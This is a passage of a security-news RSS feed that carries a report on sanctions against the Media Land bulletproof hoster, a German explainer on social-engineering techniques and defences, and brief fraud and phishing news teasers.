<p data-start="4193" data-end="4279">The indictment follows coordinated international action against the alleged operators. In November 2025, the U.S. Department of the Treasury's Office of Foreign Assets Control, together with authorities from the United Kingdom and Australia, sanctioned Media Land for facilitating global <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28963">ransomware</a> operations, distributed denial-of-service attacks, and other malicious cyber activities.</p>
<p data-start="4583" data-end="4785">The sanctions also targeted Volosovik, Zatolokin, and Pankova individually, along with Media Land subsidiaries Media Land Technology (MLT), <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="Data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28965">Data</a> Center Kirishi (DC Kirishi), and sister company ML Cloud.</p>
<p data-start="4787" data-end="4949">On July 13, the <a href="https://thecyberexpress.com/chat-control-1-0-returns-after-euro-parliament/" target="_blank" rel="noopener">European Union</a> also announced sanctions against the companies and key individuals as part of broader efforts to disrupt cybercrime infrastructure.</p>

<h3 data-section-id="1avn398" data-start="4951" data-end="4999"><strong>International Agencies Back the Investigation</strong></h3>
<p data-start="5001" data-end="5176">The investigation was led by the FBI Cleveland Division with support from the <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="Cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28966">Cybersecurity</a> and Infrastructure Security Agency (CISA) and the Office of Foreign Assets Control.</p>
<p data-start="5178" data-end="5509">Authorities also received assistance from the National Police of the Netherlands, the Public Prosecutor's Office of the Netherlands, the United Kingdom's National <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28969">Crime</a> Agency, the United Kingdom Foreign Commonwealth and Development Office, the Australian Department of Foreign Affairs and Trade, and the Australian Federal Police.</p>
<p data-start="5511" data-end="5814" data-is-last-node="" data-is-only-node="">Officials from <a href="https://thecyberexpress.com/cisa-cve-2026-48939-cve-2026-56291/" target="_blank" rel="noopener">CISA</a> and partner agencies said disrupting bulletproof hosting providers remains essential because these services form a critical part of the cybercriminal ecosystem by enabling ransomware, phishing, malware, and other malicious operations while helping threat actors remain anonymous.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist Social Engineering?]]></title>
<description><![CDATA[Mit Social-Engineering-Techniken manipulieren Cyberkriminelle die menschliche Psyche. Lesen Sie, wie das funktioniert und wie Sie sich schützen können.sp3n | shutterstock.com



Selbst wenn Sie bei der Absicherung Ihres Rechenzentrums, Ihrer Cloud-Implementierungen und der physischen Sicherheit I...]]></description>
<link>https://tsecurity.de/de/3669518/it-security-nachrichten/was-ist-social-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669518/it-security-nachrichten/was-ist-social-engineering/</guid>
<pubDate>Wed, 15 Jul 2026 05:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/sp3n-shutterstock.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Puppet Master 16z9" class="wp-image-4006516" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit Social-Engineering-Techniken manipulieren Cyberkriminelle die menschliche Psyche. Lesen Sie, wie das funktioniert und wie Sie sich schützen können.</figcaption></figure><p class="imageCredit">sp3n | shutterstock.com</p></div>



<p class="wp-block-paragraph">Selbst wenn Sie bei der Absicherung Ihres Rechenzentrums, Ihrer Cloud-Implementierungen und der physischen Sicherheit Ihres Firmengebäudes alle Register ziehen – mit Hilfe von Social Engineering finden gewiefte Cyberkriminelle meistens einen Weg, diese Maßnahmen zu umgehen.</p>



<h2 class="wp-block-heading">Social Engineering – Definition</h2>



<p class="wp-block-paragraph"><a href="https://de.wikipedia.org/wiki/Social_Engineering_(Sicherheit)" title="Social Engineering" target="_blank" rel="noopener">Social Engineering</a> bezeichnet die “Kunst”, menschliche Schwächen auszunutzen, um sich Zugang zu Gebäuden, Systemen oder Daten zu verschaffen. Anstatt zu versuchen, eine Software-Schwachstelle zu finden und auszunutzen, wird ein Social Engineer beispielsweise einen Mitarbeiter anrufen und sich als IT-Support-Angestellter ausgeben, um ihn zur Herausgabe seines Passworts zu bewegen.</p>



<p class="wp-block-paragraph">Der bekannte Hacker Kevin Mitnick hat den Begriff Social Engineering in den 1990er Jahren entscheidend mitgeprägt. Die Grundidee, sich menschliches Verhalten zunutze zu machen und die Techniken dahinter, gibt es allerdings schon so lange, wie es Betrüger gibt.</p>



<h2 class="wp-block-heading">Social Engineering – Techniken</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2780856/social-engineering-angriffe-erkennen-und-verhindern.html" title="Social Engineering" target="_blank">Social Engineering</a> hat sich für Cyberkriminelle als besonders erfolgreich erwiesen, wenn es darum geht in Unternehmen einzudringen. Sobald ein Angreifer das Passwort eines vertrauenswürdigen Mitarbeiters erbeutet hat, kann er sich damit einloggen und sensible Daten auslesen. Mit einer Zugangskarte oder einem Code, der physischen Zugang gewährt, können Cyberkriminelle sogar noch größeren Schaden anrichten.</p>



<p class="wp-block-paragraph">Im Artikel “<a href="https://www.csoonline.com/article/2123704/social-engineering--anatomy-of-a-hack.html?nsdr=true" title="Social Engineering: Anatomy of a Hack" target="_blank">Social Engineering: Anatomy of a Hack</a>” beschreibt ein Penetrationtester, wie er aktuelle Ereignisse, öffentlich verfügbare Informationen aus sozialen Netzwerken und ein Hemd mit Cisco-Logo aus einem Second-Hand-Laden dazu nutzte, illegal in ein Unternehmen einzudringen. Das vier Dollar teure Gebrauchthemd half ihm, die Rezeptionisten und andere Mitarbeiter davon zu überzeugen, dass er im Auftrag von Cisco technischen Support leisten müsste. Einmal eingedrungen, war es für ihn ein Leichtes, auch anderen Teammitgliedern Zutritt zu verschaffen. Darüber hinaus gelang es dem <a href="https://www.computerwoche.de/article/2770285/was-ist-pentesting.html" title="Ethical Hacker" target="_blank">Ethical Hacker</a>, mehrere mit Malware verseuchte USB-Sticks in den Räumen zu platzieren und sich in das Unternehmensnetzwerk zu hacken. All das lief vor den Augen der Mitarbeiter ab.</p>



<p class="wp-block-paragraph">Um einen erfolgreichen Social-Engineering-Angriff zu fahren, müssen Sie nicht unbedingt zuerst in einen Second-Hand-Laden gehen, diese Angriffe funktionieren ebenso gut per E-Mail, Telefon oder über soziale Netzwerke. Allen Angriffsarten ist dabei gemein, dass sie menschliche Eigenschaften zu ihrem Vorteil nutzen – beispielsweise Gier, Angst, Neugier oder auch das Bedürfnis, anderen zu helfen.</p>



<p class="wp-block-paragraph">Cyberkriminelle nehmen sich dabei oft Wochen oder Monate Zeit, um ein Ziel auszukundschaften, bevor Sie einen persönlichen Besuch wagen, eine Nachricht senden oder einen Anruf tätigen. Zu den Vorbereitungen kann beispielsweise gehören, eine Telefonliste oder ein Organigramm des Zielunternehmens zu finden oder die Mitarbeiter über <a href="https://www.computerwoche.de/article/2752864/wenn-der-hacker-ueber-linkedin-kommt.html" title="soziale Netzwerke" target="_blank">soziale Netzwerke</a> zu recherchieren. Anschließend können Sie beispielsweise über folgende Wege aktiv werden.</p>



<ul class="wp-block-list">
<li><p><strong>Am Telefon:</strong> Ein Social Engineer könnte anrufen und vorgeben, ein Mitarbeiter oder eine vertrauenswürdige externe Autorität zu sein (zum Beispiel ein Strafverfolgungsbeamter oder ein Wirtschaftsprüfer).</p></li>



<li><p><strong>Im Büro:</strong>“Können Sie mir die Tür aufhalten? Ich habe meinen Schlüssel/ meine Zugangskarte vergessen.” Diesen Satz haben Sie sicher auch schon einmal so vernommen. Auch wenn die fragende Person nicht verdächtig erscheinen mag – das ist eine beliebte Taktik beim Social Engineering.</p></li>



<li><p><strong>Online:</strong> Soziale Netzwerke erleichtern es, Social-Engineering-Angriffe zu fahren. Über Plattformen wie LinkedIn lassen sich schnell und einfach die meisten Mitarbeiter eines Unternehmens finden. Oft kommen noch viele andere Informationen dazu, die unter Umständen für weitere Angriffe nützlich sein können.</p></li>
</ul>



<p class="wp-block-paragraph">Beim Social Engineering werden regelmäßig auch aktuelle Ereignisse, Feiertage oder auch Popkultur-Phänomene dazu eingesetzt, Opfer in die Falle zu locken. Dabei passen die Cyberkriminellen ihre Phishing-Angriffe so an, dass sie auf bestimmte Interessen (Musik, Sport, Politik, etc.) abzielen. Das erhöht die Chance, dass die mit <a href="https://www.computerwoche.de/article/2800283/das-kleine-abc-der-schadsoftware.html" title="Malware" target="_blank">Malware</a> verseuchten Anhänge angeklickt werden.</p>



<h2 class="wp-block-heading">Social Engineering – Angriffsformen</h2>



<ul class="wp-block-list">
<li><p><strong>Phishing-Angriffe</strong> (zu denen auch SMS-basierte <a title="Smishing" href="https://www.computerwoche.de/article/2796003/wie-phishing-per-sms-funktioniert.html" target="_blank">Smishing</a>– und Voice-basierte <a title="Vishing-Attacken" href="https://www.computerwoche.de/article/2796419/wie-phishing-per-telefon-funktioniert.html" target="_blank">Vishing-Attacken</a> zählen) sind oft mit geringem Aufwand verbunden. Das Motto: “Die Masse macht’s”. Im Rahmen von Phishing-Kampagnen werden oft Tausende identischer E-Mails verschickt. Anschließend müssen die Angreifer nur noch darauf warten, dass jemand leichtgläubig genug ist, um auf den enthaltenen Anhang zu klicken.</p></li>



<li><p><strong>Spear Phishing</strong> oder auch Whaling bezeichnet Phishing-Angriffe, die ganz bewusst <a title="hochrangige Ziele ins Visier nehmen" href="https://www.csoonline.com/article/3491895/e-mail-sicherheit-die-psychotricks-der-spear-phishing-betruger.html" target="_blank">hochrangige Ziele ins Visier nehmen</a>. Spear-Phishing-Angreifer verbringen im Regelfall viel Zeit damit, solche Ziele zunächst auszukundschaften. Das Ziel besteht dabei darin, einen möglichst überzeugenden, personalisierten Scam auf die Beine zu stellen.</p></li>



<li><p><strong>Baiting</strong> ist ein essenzieller Bestandteil aller Phishing-Formen – und anderen Betrügereien. Es bezeichnet die Verlockung, mit der die Ziele in Versuchung geführt werden – sei es eine SMS, die kostenlose Geschenkkarten verspricht oder eine E-Mail, die Kryptowährungen zu besonders attraktiven Preisen oder gar kostenlos in Aussicht stellt.</p></li>



<li><p>Beim <strong>Pretexting</strong> handelt es sich um eine <a title='betrügerische Form von "Storytelling"' href="https://www.computerwoche.de/article/2803547/was-ist-pretexting.html" target="_blank">betrügerische Form von “Storytelling”</a>. Die dabei erfundene Geschichte soll das Opfer zum Beispiel dazu bewegen, persönliche Informationen oder Zugangsdaten preiszugeben. Weiß ein Angreifer beispielsweise, bei welcher Bank sein Opfer Kunde ist, könnte er sich als Mitarbeiter des Kundendiensts ausgeben und unter einem Vorwand wie “Zahlungsverzug” versuchen, Finanzinformationen zu erhalten.</p></li>



<li><p><strong>Business Email Compromise</strong> (BEC), auch bekannt als <a title="CEO-Fraud" href="https://www.computerwoche.de/article/2765169/wenn-hacker-chef-spielen.html" target="_blank">CEO-Fraud</a>, kombiniert mehrere der bislang genannten Techniken. Ein Angreifer erlangt entweder die Kontrolle über die E-Mail-Adresse eines Opfers oder schafft es, E-Mails zu versenden, die so aussehen, als kämen sie von dieser legitimen Adresse. Damit kontaktieren die Angreifer die Untergebenen des Angegriffenen in seinem Namen und ordnen beispielsweise dringliche Überweisungen an.</p></li>



<li><p><strong>Tailgating</strong> ist eine physische Social-Engineering-Form, bei der Angreifer den Mitarbeitern eines Unternehmens <a title="ins Firmengebäude folgen" href="https://www.csoonline.com/article/3493920/10-essenzielle-masnahmen-fur-physische-sicherheit.html" target="_blank">ins Firmengebäude folgen</a>. Dazu könnten diese sich beispielsweise als Lieferant oder neuer Mitarbeiter, der den Ausweis vergessen hat, ausgeben.</p></li>
</ul>



<h2 class="wp-block-heading">Social Engineering – Beispiele</h2>



<p class="wp-block-paragraph">Um ein Gefühl dafür zu bekommen, auf welche Social-Engineering-Taktiken Sie besonders achten sollten, empfiehlt sich ein Blick auf erfolgreiche Angriffe der Vergangenheit. Hierbei konzentrieren wir uns auf drei spezifische Social-Engineering-Angriffe, die für Cyberkriminelle besonders einträglich ausgefallen sind:</p>



<p class="wp-block-paragraph"><strong>1. Etwas Verlockendes anbieten</strong></p>



<p class="wp-block-paragraph">Jeder Trickbetrüger weiß: Am einfachsten ist es, aus der menschlichen Gier Profit zu schlagen. Das bildet die Grundlage des klassischen <a href="https://www.computerwoche.de/article/2600682/insider-chat-mit-einem-online-betrueger.html" title="nigerianischen 419-Scams" target="_blank">nigerianischen 419-Scams</a>: Hierbei gaukeln Betrüger ihren Opfern vor, sie müssten hohe, unrechtmäßig erworbene Geldsummen aus dem eigenen Land zu einer sicheren Bank im Ausland transferieren. Dazu bräuchten sie Unterstützung: Gegen die Zahlung vermeintlicher Provisions-, Verwaltungs- oder Versicherungsgebühren könnten die Opfer einen Gutteil des oft millionenschweren Geldbetrags abbekommen, so dass betrügerische Versprechen. </p>



<p class="wp-block-paragraph">Angriffe dieser Art sind seit Jahrzehnten bekannt und eigentlich eine Lachnummer, aber nichtsdestotrotz immer noch eine effektive Social-Engineering-Technik, auf die Menschen hereinfallen: Im Jahr 2007 überwies der Schatzmeister eines dünn besiedelten Bezirks im US-Bundesstaat Michigan einem solchen Betrüger <a href="https://www.cfo.com/risk-compliance/2007/06/treasurer-steals-to-pay-for-e-mail-scam/" title="1,2 Millionen Dollar an öffentlichen Geldern" target="_blank" rel="noopener">1,2 Millionen Dollar an öffentlichen Geldern</a> – in der Hoffnung abkassieren zu können. </p>



<p class="wp-block-paragraph">Ein weiterer gängiger Köder ist die Aussicht auf einen neuen, besseren Job: Im Rahmen einer äußerst peinlichen Kompromittierung traf es im Jahr 2011 das Sicherheitsunternehmen RSA auf diese Weise. Mindestens zwei Mitarbeiter öffneten eine Malware-verseuchte Datei, die <a href="https://www.networkworld.com/article/697270/malware-cybercrime-was-this-the-email-that-took-down-rsa.html" title="an eine Phishing-E-Mail angehängt war" target="_blank">an eine Phishing-E-Mail angehängt war</a>. Der Dateiname: “2011 recruitment plan.xls”.</p>



<p class="wp-block-paragraph"><strong>2. Fake it till you make it</strong></p>



<p class="wp-block-paragraph">Eine der simpelsten – und überraschenderweise auch erfolgreichsten – Social-Engineering-Techniken besteht darin, sich als ratlosen Mitarbeiter auszugeben. Bei einem seiner legendären frühen Betrugsversuche verschaffte sich Kevin Mitnick Zugang zu den Betriebssystem-Entwicklungsservern der <a href="http://passwordresearch.com/stories/story47.html" title="Digital Equipment Corporation" target="_blank" rel="noopener">Digital Equipment Corporation</a>. Sein Vorgehen: Er rief bei DEC an, gab sich als leitender Entwickler aus und behauptete, er habe Probleme mit dem Login. Er wurde postwendend mit neuen Logindaten versorgt. Das spielte sich schon 1979 ab – man sollte also meinen, die Dinge hätten sich seitdem verbessert. Das ist allerdings nicht der Fall: Im Jahr 2016 erlangte ein Hacker <a href="https://www.nytimes.com/2016/02/09/us/hackers-access-employee-records-at-justice-and-homeland-security-depts.html" title="die Kontrolle über ein E-Mail-Konto" target="_blank" rel="noopener">die Kontrolle über ein E-Mail-Konto</a> des US-Justizministeriums und nutzte es, um sich wie seinerzeit Mitnick Zugangsdaten zu verschaffen. </p>



<p class="wp-block-paragraph">Zwar haben viele Organisationen Barrieren aufgebaut, die diese Art des dreisten Betrugs verhindern sollen, aber oft ist es nicht besonders schwer, sie zu umgehen. Als Hewlett-Packard (HP) im Jahr 2005 <a href="https://www.welt.de/print-welt/article155234/HP-Chef-gesteht-Verwicklung.html" title="Privatdetektive damit beauftragte " target="_blank" rel="noopener">Privatdetektive damit beauftragte </a>herauszufinden, welche Vorstandsmitglieder Informationen an die Presse durchstachen, versorgte das Unternehmen die Schnüffler mit den letzten vier Ziffern der Sozialversicherungsnummer ihrer Zielpersonen. Diese Daten akzeptierte der technische Support von HPs TK-Provider AT&amp;T als Identitätsnachweis und händigte den Detektiven detaillierte Anrufprotokolle aus.</p>



<p class="wp-block-paragraph"><strong>3. Autorität spielen</strong></p>



<p class="wp-block-paragraph">Viele Menschen sind daran gewöhnt, Autoritäten zu respektieren. Das wissen auch Cyberkriminelle. Sie spielen sich als Vorgesetzte oder Führungskräfte aus, um an ihr Ziel zu gelangen. So überwiesen im Jahr 2015 Finanzmitarbeiter von Ubiquiti Networks Firmengelder in Millionenhöhe <a href="https://krebsonsecurity.com/2015/08/tech-firm-ubiquiti-suffers-46m-cyberheist/" title="an Social-Engineering-Betrüger" target="_blank" rel="noopener">an Social-Engineering-Betrüger</a>, die sich als Führungskräfte des Unternehmens ausgegeben und ihre Glaubwürdigkeit mit gefälschten E-Mail-Absendern unterstrichen hatten. </p>



<p class="wp-block-paragraph">Ein anderes Beispiel: Zur Jahrtausendwende gehörte es für (manche) britische Boulevard-Journalisten zum guten Ton, sich Zugang zu den Voicemail-Konten von für sie interessanten Personen zu verschaffen. So überzeugte ein Journalist den TK-Anbieter Vodafone davon, die Voicemail-PIN <a href="https://www.theguardian.com/uk/2011/apr/05/sienna-miller-wins-court-order-for-phone-data" title="der Schauspielerin Sienna Miller zurückzusetzen" target="_blank" rel="noopener">der Schauspielerin Sienna Miller zurückzusetzen</a>, indem er dort anrief und sich als “Kollege John aus der Credit-Control-Abteilung” ausgab. </p>



<p class="wp-block-paragraph">Ein weiteres prominentes Beispiel ist John Podesta, Hillary Clintons ehemaliger Wahlkampfleiter, der 2016 von russischen Spionen gehackt wurde. Die Cyberkriminellen hatten ihm im Vorfeld eine Phishing-E-Mail zugestellt, die als Nachricht von Google getarnt war und <a href="https://www.cbsnews.com/news/the-phishing-email-that-hacked-the-account-of-john-podesta/" title="eine Aufforderung enthielt, sein Passwort zurückzusetzen" target="_blank" rel="noopener">eine Aufforderung enthielt, sein Passwort zurückzusetzen</a>. Statt sein Konto zu schützen, gab er damit seine Anmeldedaten preis.</p>



<h2 class="wp-block-heading">Social Engineering – Zahlen &amp; Statistiken</h2>



<ul class="wp-block-list">
<li><p>Allein im Jahr 2024 konnten kriminelle Hacker durch BEC-Angriffe rund <strong>6,3 Milliarden Dollar</strong> einstreichen. (Quelle: <a href="https://www.verizon.com/business/resources/reports/2025-dbir-data-breach-investigations-report.pdf" target="_blank" rel="noreferrer noopener">Verizon DBIR 2025</a>)</p></li>



<li><p>Smishing macht <strong>39 Prozent</strong> aller mobilen Bedrohungen aus. (Quelle: <a title="SlashNext" href="https://slashnext.com/state-of-phishing-2023/" target="_blank" rel="noopener">SlashNext</a>)</p></li>



<li><p>Mit der Einführung von ChatGPT stieg die Zahl der Social-Engineering-Angriffe <strong>um 45 Prozent</strong>. (Quelle: <a title="SlashNext" href="https://slashnext.com/state-of-phishing-2023/" target="_blank" rel="noopener">SlashNext</a>)</p></li>



<li><p>Mit 17 Prozent aller Kompromittierungen ist Phishing der <strong>zweithäufigste, initiale Malware-Infektionsvektor</strong>. (Quelle: Mandiant <a title="M-Trends-Report 2024" href="https://cloud.google.com/security/resources/m-trends" target="_blank" rel="noopener">M-Trends-Report 2024</a>)</p></li>
</ul>



<h2 class="wp-block-heading">Social-Engineering-Angriffe abwehren</h2>



<p class="wp-block-paragraph">Wir haben fünf Tipps zur Abwehr von Social-Engineering-Attacken für Sie zusammengestellt:</p>



<p class="wp-block-paragraph"><strong>1. Security Awareness</strong></p>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2785239/security-awareness-richtig-planen-und-vermitteln.html" title="Security-Awareness-Schulungen" target="_blank">Security-Awareness-Schulungen</a> sind der beste Weg, um Social Engineering zu verhindern. Nur wenn die Mitarbeiter wissen, welche Gefahr ihnen droht, können sie sich gegen solche Angriffe wappnen. Erarbeiten Sie ein umfassendes Schulungsprogramm, dass zu mehr Sicherheitsbewusstsein führt! Es sollte regelmäßig aktualisiert werden, um sowohl allgemeinen Phishing-Bedrohungen als auch neuen, <a href="https://www.computerwoche.de/article/2798234/neue-wege-zum-phishing-erfolg.html" title="gezielten Bedrohungen" target="_blank">gezielten Bedrohungen</a> angemessen begegnen zu können. </p>



<p class="wp-block-paragraph">Dabei sollten Sie von einer tiefgehenden Erklärung technischer Schwachstellen und Details absehen und stattdessen Beispiele nennen, die die Methoden der Angreifer in den Fokus stellen. Auch interaktive Elemente wie ein Quiz können dazu beitragen, Mitarbeiter vorzubereiten.</p>



<p class="wp-block-paragraph"><strong>2. Security-Briefing für Mitarbeiter in Schlüsselpositionen</strong></p>



<p class="wp-block-paragraph">Unternehmen sollten Führungskräfte und leitende Angestellte in ihre Bemühungen einbeziehen, da sie für Cyberkriminelle die <a href="https://www.computerwoche.de/a/so-werden-ceos-hereingelegt,3256518" title="attraktivsten Social-Engineering-Ziele" target="_blank">attraktivsten Social-Engineering-Ziele</a> darstellen. Wichtig ist es auch Mitarbeiter, die die Berechtigung zu Finanztransaktionen haben, regelmäßig über <a href="https://www.cio.de/a/wenn-hacker-chef-spielen,3331676" title="die Gefahren aufzuklären" target="_blank">die Gefahren aufzuklären</a>.</p>



<p class="wp-block-paragraph"><strong>3. Bestehende Prozesse prüfen</strong></p>



<p class="wp-block-paragraph">Für finanzielle und andere wichtige Transaktionen bietet es sich an, zusätzliche Kontrollmaßnahmen einzuziehen. Dabei gilt es im Auge zu behalten, dass einige Schutzmaßnahmen, beispielsweise eine Aufgabentrennung, sinnlos werden könnten, wenn es sich um eine <a href="https://www.computerwoche.de/article/2772542/mitarbeiter-die-zu-innentaetern-wurden.html" title="Insider-Bedrohung" target="_blank">Insider-Bedrohung</a> handelt. Eine regelmäßige Risikoanalyse ist zu empfehlen.</p>



<p class="wp-block-paragraph"><strong>4. Neue Richtlinien für dringende Anfragen</strong></p>



<p class="wp-block-paragraph">Sendet der Vorstandsvorsitzende eine E-Mail von seinem Gmail-Konto, sollte das bei den Mitarbeitern Alarmsignale auslösen. Um vorschnelle Reaktionen zu vermeiden, die ins Unglück führen können, sollten Mitarbeiter ein klar definiertes Notfallverfahren an die Hand bekommen und im Zweifel direkt mit dem Absender kommunizieren können.</p>



<p class="wp-block-paragraph"><strong>5. Incident Management</strong></p>



<p class="wp-block-paragraph">Überprüfen, verfeinern und testen Sie regelmäßig Ihre Incident-Management-Systeme. Dazu bieten sich Übungen mit der Geschäftsleitung und den wichtigsten Mitarbeitern an, in denen Kontrollmechanismen und potenzielle Schwachstellen auf den Prüfstand kommen.</p>



<h2 class="wp-block-heading">Social Engineering – Toolkits</h2>



<p class="wp-block-paragraph">Es gibt am Markt einige Tools und Services, die Unternehmen bei Awareness-Kampagnen und Phishing-Simulationen unterstützen:</p>



<ul class="wp-block-list">
<li><p>Das <a title="Social Engineering Toolkit" href="https://github.com/trustedsec/social-engineer-toolkit" target="_blank" rel="noopener">Social Engineering Toolkit</a> von TrustedSec steht als kostenloser Download zur Verfügung und hilft bei der Automatisierung von Penetrationstests. Zu den Features gehören neben Social Engineering auch Spear Phishing, Fake Websites und USB-basierte Angriffe.</p></li>



<li><p>Das <a title="Social Engineering Framework" href="https://www.social-engineer.org/framework/general-discussion/" target="_blank" rel="noopener">Social Engineering Framework</a> ist eine weitere gute Ressource. Laut Aussage der Macher enthält es “aktuelle wissenschaftliche, technische und psychologische Informationen” zum Thema. Das Ziel sei es, “eine Informationssammlung für Sicherheitsexperten, Penetrationstester und Enthusiasten zu schaffen”. Das Framework wird regelmäßig aktualisiert.</p></li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.csoonline.com/article/571993/social-engineering-definition-examples-and-techniques.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spanish Police take down €140 million cyber fraud ring, arrest four]]></title>
<description><![CDATA[The Spanish Police dismantled a cybercrime and money-laundering organization that made €140 million ($160 million) from investment fraud and business email compromise (BEC) attacks. [...]]]></description>
<link>https://tsecurity.de/de/3669094/it-security-nachrichten/spanish-police-take-down-140-million-cyber-fraud-ring-arrest-four/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669094/it-security-nachrichten/spanish-police-take-down-140-million-cyber-fraud-ring-arrest-four/</guid>
<pubDate>Tue, 14 Jul 2026 22:38:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Spanish Police dismantled a cybercrime and money-laundering organization that made €140 million ($160 million) from investment fraud and business email compromise (BEC) attacks. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[GoDaddy Challenges Indian Court Order Over Domain Privacy and Internet Governance Rules]]></title>
<description><![CDATA[  A legal battle in India over online fraud could have major implications for privacy and regulation of the internet around the globe, as domain name registrar Go Daddy takes exception to a Delhi High Court ruling that would impose…
Read more →
The post GoDaddy Challenges Indian Court Order Over ...]]></description>
<link>https://tsecurity.de/de/3668872/it-security-nachrichten/godaddy-challenges-indian-court-order-over-domain-privacy-and-internet-governance-rules/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668872/it-security-nachrichten/godaddy-challenges-indian-court-order-over-domain-privacy-and-internet-governance-rules/</guid>
<pubDate>Tue, 14 Jul 2026 20:22:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  A legal battle in India over online fraud could have major implications for privacy and regulation of the internet around the globe, as domain name registrar Go Daddy takes exception to a Delhi High Court ruling that would impose…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/godaddy-challenges-indian-court-order-over-domain-privacy-and-internet-governance-rules/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/godaddy-challenges-indian-court-order-over-domain-privacy-and-internet-governance-rules/">GoDaddy Challenges Indian Court Order Over Domain Privacy and Internet Governance Rules</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Turkish Banks Targeted by 8,400 Phishing Domains and 6,600 Social Media Scam Ads]]></title>
<description><![CDATA[Turkey’s banking customers are facing a large fraud campaign built around fake websites and social media advertisements. Criminals are abusing trusted financial brands to draw people into credential theft, fake loan offers, and other scams designed to steal money quickly.…
Read more →
The post Tu...]]></description>
<link>https://tsecurity.de/de/3668500/it-security-nachrichten/turkish-banks-targeted-by-8400-phishing-domains-and-6600-social-media-scam-ads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668500/it-security-nachrichten/turkish-banks-targeted-by-8400-phishing-domains-and-6600-social-media-scam-ads/</guid>
<pubDate>Tue, 14 Jul 2026 17:41:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Turkey’s banking customers are facing a large fraud campaign built around fake websites and social media advertisements. Criminals are abusing trusted financial brands to draw people into credential theft, fake loan offers, and other scams designed to steal money quickly.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/turkish-banks-targeted-by-8400-phishing-domains-and-6600-social-media-scam-ads/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/turkish-banks-targeted-by-8400-phishing-domains-and-6600-social-media-scam-ads/">Turkish Banks Targeted by 8,400 Phishing Domains and 6,600 Social Media Scam Ads</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Turkish Banks Targeted by 8,400 Phishing Domains and 6,600 Social Media Scam Ads]]></title>
<description><![CDATA[Turkey’s banking customers are facing a large fraud campaign built around fake websites and social media advertisements. Criminals are abusing trusted financial brands to draw people into credential theft, fake loan offers, and other scams designed to steal money quickly. The operation is notable...]]></description>
<link>https://tsecurity.de/de/3668381/it-security-nachrichten/turkish-banks-targeted-by-8400-phishing-domains-and-6600-social-media-scam-ads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668381/it-security-nachrichten/turkish-banks-targeted-by-8400-phishing-domains-and-6600-social-media-scam-ads/</guid>
<pubDate>Tue, 14 Jul 2026 16:55:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Turkey’s banking customers are facing a large fraud campaign built around fake websites and social media advertisements. Criminals are abusing trusted financial brands to draw people into credential theft, fake loan offers, and other scams designed to steal money quickly. The operation is notable for its scale and speed, as more than 8,400 phishing domains […]</p>
<p>The post <a href="https://cybersecuritynews.com/turkish-banks-targeted-by-8400-phishing-domains/">Turkish Banks Targeted by 8,400 Phishing Domains and 6,600 Social Media Scam Ads</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads]]></title>
<description><![CDATA[Cybercriminals are operating an industrial-scale fraud ecosystem targeting Turkey’s financial sector, using more than 8,400 phishing domains, thousands of social media advertisements, fake loan offers, illicit gambling services, and money-mule recruitment to steal credentials. Group-IB’s investig...]]></description>
<link>https://tsecurity.de/de/3667947/it-security-nachrichten/cybercriminals-target-turkish-banks-with-8400-phishing-domains-and-6600-scam-ads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667947/it-security-nachrichten/cybercriminals-target-turkish-banks-with-8400-phishing-domains-and-6600-scam-ads/</guid>
